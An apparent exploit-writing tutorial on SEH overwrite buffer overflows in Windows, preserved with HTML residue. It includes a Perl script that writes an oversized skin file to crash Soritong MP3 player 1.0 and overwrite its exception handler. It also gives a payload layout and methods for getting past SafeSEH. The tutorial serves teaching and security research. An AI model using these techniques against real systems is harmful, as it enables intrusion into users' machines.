A quick look on the stack on how the try & catch blocks are related to each other and placed on the stack :<\/p>\n
(Note : "Address of exception handler" is just one part of a SEH record - the image above is an abstract representation, merely showing the various components)<\/em><\/p>\n Windows has a default SEH (Structured Exception Handler) which will catch exceptions. If Windows catches an exception, you\u2019ll see a \u201cxxx has encountered a problem and needs to close\u201d popup. This is often the result of the default handler kicking in. It is obvious that, in order to write stable software, one should try to use development language specific exception handlers, and only rely on the windows default SEH as a last resort. When using language EH\u2019s, the necessary links and calls to the exception handling code are generate in accordance with the underlying OS. (and when no exception handlers are used, or when the available exception handlers cannot process the exception, the Windows SEH will be used. (UnhandledExceptionFilter)). So in the event an error or illegal instruction occurs, the application will get a chance to catch the exception and do something with it. If no exception handler is defined in the application, the OS takes over, catches the exception, shows the popup (asking you to Send Error Report to MS).<\/p>\n In order for the application to be able to go to the catch code, the pointer to the exception handler code is saved on the stack (for each code block). Each code block has its own stack frame, and the pointer to the exception handler is part of this stack frame. In other words : Each function\/procedure gets a stack frame. If an exception handler is implement in this function\/procedure, the exception handler gets its own stack frame. Information about the frame-based exception handler is stored in an exception_registration structure on the stack.<\/p>\n This structure ( also called a SEH record) is 8 bytes and has 2 (4 byte) elements :<\/p>\n Simple stack view on the SEH chain components :<\/p>\n At the top of the main data block (the data block of the application\u2019s \u201cmain\u201d function, or TEB (Thread Environment Block) \/ TIB (Thread Information Block)), a pointer to the top of the SEH chain is placed. This SEH chain is often called the FS:[0] chain as well.<\/p>\n So, on Intel machines, when looking at the disassembled SEH code, you will see an instruction to move DWORD ptr from FS:[0]. This ensures that the exception handler is set up for the thread and will be able to catch errors when they occur. The opcode for this instruction is 64A100000000. If you cannot find this opcode, the application\/thread may not have exception handling at all.<\/em><\/p>\n Alternatively, you can use a OllyDBG plugin called OllyGraph to create a Function Flowchart.<\/em><\/p>\n The bottom of the SEH chain is indicated by FFFFFFFF. This will trigger an improper termination of the program (and the OS handler will kick in)<\/p>\n Quick example : compile the following source code (sehtest.exe) and open the executable in windbg. Do NOT start the application yet, leave it in a paused state :<\/p>\n look at the loaded modules<\/p>\n The application sits between 00400000 and 0040c000<\/p>\n Search this area for the opcode :<\/p>\n This is proof that an exception handler is registered. Dump the TEB :<\/p>\n The pointer points to 0x0012fd0c (begin of SEH chain). When looking at that area, we see :<\/p>\n ff ff ff ff indicates the end of the SEH chain. That\u2019s normal, because the application is not started yet. (Windbg is still paused)<\/p>\n If you have the Ollydbg plugin Ollygraph installed, you could open the executable in ollydbg and create the graph, which should indicate if an exception handler is installed or not :<\/p>\n When we run the application (F5 or \u2018g\u2019), we see this :<\/p>\n The TEB for the main function is now set up. The SEH chain for the main function points at 0x0012ff40, where the exception handler is listed and will point to the exception handler function (0x0012ffb0)<\/p>\n In OllyDbg, you can see the seh chain more easily :<\/p>\n (There is a similar view in Immunity Debugger - just click "View" and select "SEH Chain")<\/p>\n Stack :<\/p>\n Here we can see a pointer to our Exception Handler function ExceptionHandler() (0x0040109A)<\/p>\n Anyways, as you can see in the explanation above the example, and in the last screenshot, exception handlers are connected\/linked to each other. They form a linked list chain on the stack, and sit relatively close to the bottom of the stack. (SEH chain). When an exception occurs, Windows ntdll.dll kicks in, retrieves the head of the SEH chain (sits at the top of TEB\/TIB remember), walks through the list and tries to find the suitable handler. If no handler is found the default Win32 handler will be used (at the bottom of the stack, the one after FFFFFFFF).<\/p>\n We see the first SE Handler record at 0012FFF40. The next SEH address points to the next SEH record (0012FFB0). The current handler points at 7C839AD8. It looks like this is some kind of OS handler (the pointers points into an OS module)<\/p>\n Then, the second SEH record entry in the chain (at 0012FFB0) has the following values : next SEH points to 0012FFE0. The handler points at 0040109A. This address is part of the executable, so it looks like this is an application handler.<\/p>\n Finally, the last SEH record in the chain (at 0012FFE0) has FFFFFFFF in nseh. This means that this is the last entry in the chain. The handler points at 7C839AD8, which is an OS handler again.<\/p>\n So, putting all pieces together, the entire SEH chain looks like this :<\/p>\n You can read more about SEH in Matt Pietrek\u2019s excellent article from 1997 : http:\/\/www.microsoft.com\/msj\/0197\/exception\/exception.aspx<\/p>\n XOR<\/strong><\/p>\n In order to be able to build an exploit based on SEH overwrite, we will need to make a distinction between Windows XP pre-SP1 and SP1 and up. Since Windows XP SP1, before the exception handler is called, all registers are XORed with each other, making them all contain 0x00000000, which means you won't be able to find a reference to your payload in one of the registers. In other words, maybe you'll see that one or more registers point at your payload at the first chance exception, but when the EH kicks in, these registers are cleared again (so you cannot jump to them directly in order to execute your shellcode). We\u2019ll talk about this later on.<\/p>\n DEP & Stack Cookies<\/strong><\/p>\n On top of that, Stack Cookies (via C++ compiler options) and DEP (Data Execution Prevention) were introduced (Windows XP SP2 and Windows 2003) . I will write an entire post on Stack cookies and DEP. In sort, you only need to remember that these two techniques can make it significantly harder to build exploits.<\/p>\n SafeSEH<\/strong><\/p>\n Some additional protection was added to compilers, helping to stop the abuse of SEH overwrites. This protection mechanism is active for all modules that are compiled with \/safeSEH<\/p>\n Windows 2003<\/strong><\/p>\n Under Windows 2003 server, more protection was added. I\u2019m not going to discuss these protections in this post (check tutorial series part 6 for more info), because things would start to get too complex at this point. As soon as you mastered this tutorial, you will be ready to look at tutorial part 6 \ud83d\ude42<\/p>\n There is a way around the XOR 0x00000000 protection and the SafeSEH protections. Since you cannot simply jump to a register (because registers are xored), a call to a series of instructions in a dll will be needed.<\/p>\n (You should try to avoid using a call from the memory space of an OS specific dll, but rather use an address from an application dll instead in order to make the exploit reliable (assuming that this dll is not compiled with safeSEH). That way, the address will be *almost* always the same, regardless of the OS version. But if there are no DLL\u2019s, and there is a non safeseh OS module that is loaded, and this module contains a call to these instructions, then it will work too.)<\/p>\n<\/blockquote>\n The theory behind this technique is : If we can overwrite the pointer to the SE handler that will be used to deal with a given exception, and we can cause the application to throw another exception (a forced exception), we should be able to get control by forcing the application to jump to your shellcode (instead of to the real exception handler function). The series of instructions that will trigger this, is POP POP RET. The OS will understand that the exception handling routine has been executed and will move to the next SEH (or to the end of the SEH chain). The pointer to this instruction should be searched for in loaded dll\u2019s\/exe\u2019s, but not in the stack (again, the registers will be made unusable). (You could try to use ntdll.dll or an application-specific dll)<\/p>\n One quick sidenote : there is an excellent Ollydbg plugin called OllySSEH<\/a>, which will scan the process loaded modules and will indicate if they were compiled with SafeSEH or not. It is important to scan the dll\u2019s and to use a pop\/pop\/ret address from a module that is not compiled with SafeSEH. If you are using Immunity Debugger, then you can use the pvefindaddr plugin to look for seh (p\/p\/r) pointers. This plugin will automatically filter invalid pointers (from safeseh modules etc) and will also look for all p\/p\/r combinations. I highly recommend using Immunity Debugger and pvefindaddr.<\/p>\n<\/blockquote>\n Normally, the pointer to the next SEH record contains an address. But in order to build an exploit, we need to overwrite it with small jumpcode to the shellcode (which should sit in the buffer right after overwriting the SE Handler). The pop pop ret sequence will make sure this code gets executed<\/p>\n In other words, the payload must do the following things<\/p>\n As explained at the top of this post, there could be no exception handlers in the application (in that case, the default OS Excecption Handler takes over, and you will have to overwrite a lot of data, all the way to the bottom of the stack), or the application uses its own exception handlers (and in that case you can choose how far \u2018deep\u2019 want to overwrite).<\/p>\n A typical payload will look like this<\/p>\n [Junk][nSEH][SEH][Nop-Shellcode]<\/p>\n Where nSEH = the jump to the shellcode, and SEH is a reference to a pop pop ret<\/p>\n Make sure to pick a universal address for overwriting the SEH. Ideally, try to find a good sequence in one of the dll\u2019s from the application itself.<\/p>\n Before looking at building an exploit, we\u2019ll have a look at how Ollydbg and windbg can help tracing down SEH handling (and assist you with building the correct payload)<\/p>\n The test case in this post is based on a vulnerability that was released last week (july 20th 2009).<\/p>\n When performing a regular stack based buffer overflow, we overwrite the return address (EIP) and make the application jump to our shellcode. When doing a SEH overflow, we will continue overwriting the stack after overwriting EIP, so we can overwrite the default exception handler as well. How this will allow us to exploit a vulnerability, will become clear soon.<\/p>\n Let\u2019s use a vulnerability in Soritong MP3 player 1.0<\/a>, made public on july 20th 2009<\/a>.<\/p>\n You can download a local copy of the Soritong MP3 player here :<\/p>\n [download id=38]38[\/download]<\/p>\n<\/blockquote>\n The vulnerability points out that an invalid skin file can trigger the overflow. We\u2019ll use the following basic perl script to create a file called UI.txt in the skin\\default folder :<\/p>\n Now open soritong. The application dies silently (probably because of the exception handler that has kicked in, and has not been able to find a working SEH address (because we have overwritten the address).<\/p>\n FIrst, we\u2019ll work with Ollydbg\/Immunity to clearly show you the stack and SEH chain . Open Ollydbg\/Immunity Debugger and open the soritong.exe executable. Press the \u201cplay\u201d button to run the application. Shortly after, the application dies and stops at this screen :<\/p>\n The application has died at 0x0042E33. At that point, ESP points at 0x0012DA14. Further down the stack (at 0012DA6C), we see FFFFFFFF, which looks likeindicates the end of the SEH chain. Directly below 0x0012DA14, we see 7E41882A, which is the address of the default SE handler for the application. This address sits in the address space of user32.dll.<\/p>\n A couple of addresses higher on the stack, we can see some other exception handlers, but all of them also belong to the OS (ntdll in this case). So it looks like this application (or at least the function that was called and caused the exception) does not have its own exception handler routine.<\/p>\n When we look at the threads (View - Threads) select the first thread (which refers to the start of the application), right click and choose \u2018dump thread data block\u2019, we can see the Pointer to the SEH chain :<\/p>\n So the exception handler worked. We caused an exception (by building a malformed ui.txt file). The application jumped to the SEH chain (at 0x0012DF64).<\/p>\n Go to \u201cView\u201d and open \u201cSEH chain\u201d<\/p>\n The SE handler address points to the location where the code sits that needs to be run in order to deal with the exception.<\/p>\n The SE handler has been overwritten with 4 A\u2019s. Now it becomes interesting. When the exception is handled, EIP will be overwritten with the address in the SE Handler. Since we can control the value in the handler, we can have it execute our own code.<\/p>\n When we now do the same in windbg, this is what we see :<\/p>\n Close Ollydbg, open windbg and open the soritong.exe file.<\/p>\n The debugger first breaks (it puts a breakpoint before executing the file). Type command g (go) and press return. This will launch the application. (Alternatively, press F5)<\/p>\n Soritong mp3 player launches, and dies shortly after. Windbg has catched the \u201cfirst change exception\u201d. This means that windbg has noticed that there was an exception, and even before the exception could be handled by the application, windbg has stopped the application flow :<\/p>\n The message states \u201cThis exception may be expected and handled\u201d.<\/p>\n Look at the stack :<\/p>\n ffffffff here indicates the end of the SEH chain. When we run !analyze -v, we get this :<\/p>\n The exception record points at ffffffff, which means that the application did not use an exception handler for this overflow (and the \u201clast resort\u201d handler was used, which is provided for by the OS).<\/p>\n When you dump the TEB after the exception occurred, you see this :<\/p>\n The exception chain says :<\/p>\n => so we have overwritten the exception handler. Now let the appliation catch the exception (simply type \u2018g\u2019 again in windbg, or press F5) and let\u2019 see what happens :<\/p>\n eip now points to 41414141, so we can control EIP.<\/p>\n The exchain now reports<\/p>\n![\"image\"](\"\/wp-content\/uploads\/2009\/07\/image25.png\" "\\"image\\"")
<\/a><\/p>\n\n
<\/a><\/p>\n#include<stdio.h>\n#include<string<\/span>.h>\n#include<windows.h>\n\nint<\/span> ExceptionHandler(void<\/span>);\nint<\/span> main(int<\/span> argc,char<\/span> *argv[]){\n\nchar<\/span> temp[512];\n\nprintf("Application launched"<\/span>);\n\n __try {\n\n strcpy(temp,argv[1]);\n\n } __except ( ExceptionHandler() ){\n}\nreturn<\/span> 0;\n}\nint<\/span> ExceptionHandler(void<\/span>){\nprintf("Exception"<\/span>);\nreturn<\/span> 0;\n}<\/pre>\n<\/div>\nExecutable search path is<\/span>:\nModLoad: 00400000 0040c000 c:\\sploits\\seh\\lcc\\sehtest.exe\nModLoad: 7c900000 7c9b2000 ntdll.dll\nModLoad: 7c800000 7c8f6000 C:\\WINDOWS\\system32\\kernel32.dll\nModLoad: 7e410000 7e4a1000 C:\\WINDOWS\\system32\\USER32.DLL\nModLoad: 77f10000 77f59000 C:\\WINDOWS\\system32\\GDI32.dll\nModLoad: 73d90000 73db7000 C:\\WINDOWS\\system32\\CRTDLL.DLL<\/pre>\n<\/div>\n0:000> s 00400000 l 0040c000 64 A1\n00401225 64 a1 00 00 00 00 55 89-e5 6a ff 68 1c a0 40 00 d.....U..j.h..@.\n0040133f 64 a1 00 00 00 00 50 64-89 25 00 00 00 00 81 ec d.....Pd.%......<\/pre>\n<\/div>\n
0:000> d fs:[0]\n003b:00000000 0c fd 12 00<\/span><\/strong> 00 00 13 00-00 e0 12 00 00 00 00 00 ................\n003b:00000010 00 1e 00 00 00 00 00 00-00 f0 fd 7f 00 00 00 00 ................\n003b:00000020 84 0d 00 00 54 0c 00 00-00 00 00 00 00 00 00 00 ....T...........\n003b:00000030 00 d0 fd 7f 00 00 00 00-00 00 00 00 00 00 00 00 ................\n003b:00000040 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................\n003b:00000050 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................\n003b:00000060 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................\n003b:00000070 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................\n0:000> !exchain\n0012fd0c: ntdll!strchr+113 (7c90e920)<\/pre>\n<\/div>\n0:000> d 0012fd0c\n0012fd0c ff ff ff ff<\/span><\/strong> 20 e9 90 7c-30 b0 91 7c 01 00 00 00 .... ..|0..|....\n0012fd1c 00 00 00 00 57 e4 90 7c-30 fd 12 00 00 00 90 7c ....W..|0......|\n0012fd2c 00 00 00 00 17 00 01 00-00 00 00 00 00 00 00 00 ................\n0012fd3c 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................\n0012fd4c 08 30 be 81 92 24 3e f8-18 30 be 81 18 aa 3c 82 .0...$>..0....<.\n0012fd5c 90 2f 20 82 01 00 00 00-00 00 00 00 00 00 00 00 .\/ .............\n0012fd6c 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................\n0012fd7c 01 00 00 f4 00 00 00 00-00 00 00 00 00 00 00 00 ................<\/pre>\n<\/div>\n<\/a><\/p>\n0:000> d fs:[0]\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for<\/span> ...\n003b:00000000 40 ff 12 00<\/span><\/strong> 00 00 13 00-00 d0 12 00 00 00 00 00 @...............\n003b:00000010 00 1e 00 00 00 00 00 00-00 f0 fd 7f 00 00 00 00 ................\n003b:00000020 84 0d 00 00 54 0c 00 00-00 00 00 00 00 00 00 00 ....T...........\n003b:00000030 00 d0 fd 7f 00 00 00 00-00 00 00 00 00 00 00 00 ................\n003b:00000040 a0 06 85 e2 00 00 00 00-00 00 00 00 00 00 00 00 ................\n003b:00000050 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................\n003b:00000060 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................\n003b:00000070 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................\n0:000> d 0012ff40\n0012ff40 b0 ff 12 00 d8 9a 83 7c-e8 ca 81 7c 00 00 00 00 .......|...|....\n0012ff50 64 ff 12 00 26 cb 81 7c-00 00 00 00 b0 f3 e8 77 d...&..|.......w\n0012ff60 ff ff ff ff<\/span><\/strong> c0 ff 12 00-28 20 d9 73 00 00 00 00 ........( .s....\n0012ff70 4a f7 63 01 00 d0 fd 7f-6d 1f d9 73 00 00 00 00 J.c.....m..s....\n0012ff80 00 00 00 00 00 00 00 00-ca 12 40 00 00 00 00 00 ..........@.....\n0012ff90 00 00 00 00 f2 f6 63 01-4a f7 63 01 00 d0 fd 7f ......c.J.c.....\n0012ffa0 06 00 00 00 04 2d 4c f4-94 ff 12 00 ab 1c 58 80 .....-L.......X.\n0012ffb0 e0 ff 12 00 9a 10 40 00-1c a0 40 00 00 00 00 00 ......@...@.....\n<\/a><\/pre>\n<\/div>\n<\/a><\/p>\n<\/a><\/p>\n<\/a> <\/p>\nChanges in Windows XP SP1 with regards to SEH, and the impact of GS\/DEP\/SafeSEH and other protection mechanisms on exploit writing.<\/h3>\n
XOR, SafeSEH,\u2026. but how can we then use the SEH to jump to shellcode ?<\/h3>\n
\n
\n
\n
<\/a><\/p>\nSee SEH in action - Ollydbg<\/h3>\n
\n
$uitxt = "ui.txt"<\/span>;\n\nmy $junk = "A" x 5000 ; \n\nopen(myfile,">$uitxt") ;\nprint myfile $junk;<\/pre>\n<\/div>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\nSee SEH in action - Windbg<\/h3>\n
<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n00422e33 8810 mov byte<\/span> ptr [eax],dl ds:0023:00130000=41\n0:000> d esp\n0012da14 3c eb aa 00 00 00 00 00-00 00 00 00 00 00 00 00 <...............\n0012da24 94 da 12 00 00 00 00 00-e0 a9 15 00 00 00 00 00 ................\n0012da34 00 00 00 00 00 00 00 00-00 00 00 00 94 88 94 7c ...............|\n0012da44 67 28 91 7c 00 eb 12 00-00 00 00 00 01 a0 f8 00 g(.|............\n0012da54 01 00 00 00 24 da 12 00-71 b8 94 7c d4 ed 12 00 ....$...q..|....\n0012da64 8f 04 44 7e 30 88 41 7e-ff ff ff ff<\/span><\/strong> 2a 88 41 7e ..D~0.A~....*.A~\n0012da74 7b 92 42 7e af 41 00 00-b8 da 12 00 d8 00 0b 5d {.B~.A.........]\n0012da84 94 da 12 00 bf fe ff ff-b8 f0 12 00 b8 a5 15 00 ................<\/pre>\n<\/div>\nFAULTING_IP:\nSoriTong!TmC13_5+3ea3\n00422e33 8810 mov byte<\/span> ptr [eax],dl\n\nEXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)\nExceptionAddress: 00422e33 (SoriTong!TmC13_5+0x00003ea3)\n ExceptionCode: c0000005 (Access violation)\n ExceptionFlags: 00000000\nNumberParameters: 2\n Parameter[0]: 00000001\n Parameter[1]: 00130000\nAttempt to write to address 00130000\n\nFAULTING_THREAD: 00000a4c\n\nPROCESS_NAME: SoriTong.exe\n\nADDITIONAL_DEBUG_TEXT:\nUse '!findthebuild'<\/span> command to search for<\/span> the target build information.\nIf the build information is<\/span> available, run '!findthebuild -s ; .reload'<\/span> to set symbol path and load symbols.\n\nFAULTING_MODULE: 7c900000 ntdll\n\nDEBUG_FLR_IMAGE_TIMESTAMP: 37dee000\n\nERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at "0x%08lx"<\/span> referenced memory at "0x%08lx"<\/span>. The memory could not be "%s"<\/span>.\n\nEXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at "0x%08lx"<\/span> referenced memory at "0x%08lx"<\/span>. The memory could not be "%s"<\/span>.\n\nEXCEPTION_PARAMETER1: 00000001\n\nEXCEPTION_PARAMETER2: 00130000\n\nWRITE_ADDRESS: 00130000 \n\nFOLLOWUP_IP:\nSoriTong!TmC13_5+3ea3\n00422e33 8810 mov byte<\/span> ptr [eax],dl\n\nBUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_WRONG_SYMBOLS\n\nPRIMARY_PROBLEM_CLASS: INVALID_POINTER_WRITE\n\nDEFAULT_BUCKET_ID: INVALID_POINTER_WRITE\n\nIP_MODULE_UNLOADED:\nud+41414140\n41414141 ?? ???\n\nLAST_CONTROL_TRANSFER: from 41414141 to 00422e33\n\nSTACK_TEXT:\nWARNING: Stack unwind information not available. Following frames may be wrong.\n0012fd38 41414141 41414141 41414141 41414141 SoriTong!TmC13_5+0x3ea3\n0012fd3c 41414141 41414141 41414141 41414141 <Unloaded_ud.drv>+0x41414140\n0012fd40 41414141 41414141 41414141 41414141 <Unloaded_ud.drv>+0x41414140\n0012fd44 41414141 41414141 41414141 41414141 <Unloaded_ud.drv>+0x41414140\n0012fd48 41414141 41414141 41414141 41414141 <Unloaded_ud.drv>+0x41414140\n0012fd4c 41414141 41414141 41414141 41414141 <Unloaded_ud.drv>+0x41414140\n0012fd50 41414141 41414141 41414141 41414141 <Unloaded_ud.drv>+0x41414140\n0012fd54 41414141 41414141 41414141 41414141 <Unloaded_ud.drv>+0x41414140\n\n <\/span>. . . (removed some of the lines)<\/span>\n\n0012ffb8 41414141 41414141 41414141 41414141 <Unloaded_ud.drv>+0x41414140\n0012ffbc \n\nSYMBOL_STACK_INDEX: 0\n\nSYMBOL_NAME: SoriTong!TmC13_5+3ea3\n\nFOLLOWUP_NAME: MachineOwner\n\nMODULE_NAME: SoriTong\n\nIMAGE_NAME: SoriTong.exe\n\nSTACK_COMMAND: ~0s ; kb\n\nBUCKET_ID: WRONG_SYMBOLS\n\nFAILURE_BUCKET_ID: INVALID_POINTER_WRITE_c0000005_SoriTong.exe!TmC13_5\n\nFollowup: MachineOwner<\/pre>\n<\/div>\n0:000> d fs:[0]\n003b:00000000 64 fd 12 00<\/span><\/strong> 00 00 13 00-00 c0 12 00 00 00 00 00 d...............\n003b:00000010 00 1e 00 00 00 00 00 00-00 f0 fd 7f 00 00 00 00 ................\n003b:00000020 00 0f 00 00 30 0b 00 00-00 00 00 00 08 2a 14 00 ....0........*..\n003b:00000030 00 b0 fd 7f 00 00 00 00-00 00 00 00 00 00 00 00 ................\n003b:00000040 38 43 a4 e2 00 00 00 00-00 00 00 00 00 00 00 00 8C..............\n003b:00000050 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................\n003b:00000060 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................\n003b:00000070 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................<\/pre>\n<\/div>\n0:000> d 0012fd64\n0012fd64 41 41 41 41<\/strong><\/span> 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\n0012fd74 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\n0012fd84 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\n0012fd94 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\n0012fda4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\n0012fdb4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\n0012fdc4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\n0012fdd4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA<\/pre>\n<\/div>\n0:000> !exchain\n0012fd64: <Unloaded_ud.drv>+41414140 (41414141<\/span><\/strong>)\nInvalid exception stack at 41414141<\/pre>\n<\/div>\n<\/a><\/p>\n0:000> !exchain\n0012d658: ntdll!RtlConvertUlongToLargeInteger+7e (7c9032bc)\n0012fd64: <Unloaded_ud.drv>+41414140 (41414141)\nInvalid exception stack at 41414141<\/pre>\n<\/div>\n